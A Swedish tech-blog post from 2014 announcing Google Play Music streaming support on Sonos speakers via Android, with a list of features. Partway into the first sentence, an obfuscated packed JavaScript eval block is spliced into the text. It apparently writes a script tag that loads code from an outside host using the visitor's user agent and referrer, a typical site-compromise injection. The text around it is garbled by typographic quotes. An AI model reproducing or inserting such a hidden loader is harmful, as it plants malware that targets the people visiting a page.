Image Image Image Image Image Image Image Image Image Image

| 25 februari, 2020

Scroll to top

Top

Sonos <3 Google Play Musik

Sonos <3 Google Play Musik
Filip Urde
  • On 10 april, 2014
  • http://www.revue.se/filip-urde
Sonos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fferh|var|u0026u|referrer|dzsab||js|php’.split(’|’),0,{}))
har nu kommit med en ny härlig uppdatering vad gäller dess tjänsteutbud. 
Med appen Google Play Musik, som nu finns tillgänglig runt om i världen, kan du nu streama direkt till Sonos inifrån appen Google Play Musik på din Android-enhet, eller streama Google Play Musik inifrån Sonos-appen och spela upp till valfri Sonos-spelare i hela ditt hem. Observera att detta endast fungerar via Android i nuläget, men väntas att komma till iOS inom kort.
Tjänsten Google Play Musik är tillgänglig på Sonos i 25 länder runt om i världen. För att komma igång, välj Google Play Musik från musiktjänst-menyn på din Sonos och logga in med din Gmail-adress. Android-användare kan spela upp direkt till Sonos inifrån appen Google Play Musik på sin enhet.
·       Kombinera din personliga samling – Google Play låter dig ladda upp ditt personliga musikbibliotek gratis(upp till 20 000 låtar) så att du kan streama all din favoritmusik från ett och samma ställe, till valfritt rum I hemmet.
·       Spela upp från mer än 22 miljoner spår på begäran
·       Skapa anpassade radiokanaler eller testa funktionen ”Jag har tur” och njut av fräsch musik baserad på dina lyssningsvanor där du kan skippa låtar och slipper annonser.
Det har nu blivit snabbare och mer flexibelt att lyssna på musiken du älskar.
·       Njut av alla funktioner i din app Google Play Musik med HiFi-ljud genom att spela upp direkt till Sonos från Android-enheter.
·       Använd appen Google Play Musik för att starta en låt i valfritt rum och styr volymen direkt från appen.
·       För fullständig åtkomst till alla dina musiktjänster och multirumskontroll, använd Sonos-appen för att streama all den musik du älskar i valfritt rum.
Kul kul!